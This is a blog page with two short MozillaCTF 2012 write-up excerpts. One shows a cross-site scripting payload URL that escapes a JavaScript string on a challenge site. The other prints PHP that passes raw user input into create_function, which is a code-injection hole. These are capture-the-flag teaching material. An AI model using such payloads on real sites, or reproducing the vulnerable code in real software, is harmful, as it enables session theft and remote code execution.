26
Jan
2012

MozillaCTF 2012 – Dory’s language school (300)

The challenge is simple:

Find a Cross-Site Scripting hole in Dory’s Language School and steal her cookie. Links will be accepted at Twitter. Send a private message to @MozillaCTF with hashtag #Dory. Private, because you do not want to give away your exploit to the public.

The sites makes the common mistake of including user input within javascript without the proper escaping: the backslash is not escaped. This means https://challenge20.mozillactf.org/?language=a;alert(1);//\ contains the following HTML code:

<!doctype html>
<html>
<head>
    <title>Dory's Language School</title>
    
        <script>	
	_=eval,_(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)}}return p}('e c(){2=b.9("2");6=/5 a = \'([^\']*)\';/.4(2[0].7);3=/5 3 = \'([^\']*)\';/.4(2[0].7);h(!/^[\\d]*$/.8(6[1])||!/^[\\d]*$/.8(3[1]))g("f i")}',19,19,'||script|country|exec|var|lan|innerHTML|test|getElementsByTagName|lang|document|protect||function|attack|alert|if|detected'.split('|'),0,{}))
       
        var lang = ';alert(1);//\'; var country = ';alert(1);//\';

{Read More}

26
Jan
2012

MozillaCTF 2012 – Sharkpedia (400)

Sharkpedia was a webchallenge that frustrated us at first. But like anything, it’s easy once you know how πŸ™‚

The code for Sharkpedia (which we grabbed atfer we solved it, no way around that):

<?php
$param = @$_GET['p'];

$mode = preg_replace('/[^\w]/', '', $param);

include('textcontainer.php'); // actual content

$functions = array(
	'a' => @create_function('', "return '<h2>$param: $textcontainer[0]';"),
	'b' => @create_function('', "return '<h2>$param: $textcontainer[1]';"),
	'c' => @create_function('', "return '<h2>$param: $textcontainer[2]';")
);
$links = '';
foreach($functions as $char=>$code)
	$links.= "<a href=\"?p=$char\">$char</a>, ";
$links = substr($links, 0, -2);

if(empty($mode) || !isset($functions[$mode]))
{
	echo "<p>The following functions are available: " . $links;
    echo "</p>";
	exit;
}

echo "<h2>Result</h2>";
echo $functions[$mode]();
echo "<p><a href=\"?p=\">back</a></p>";

?>

{Read More}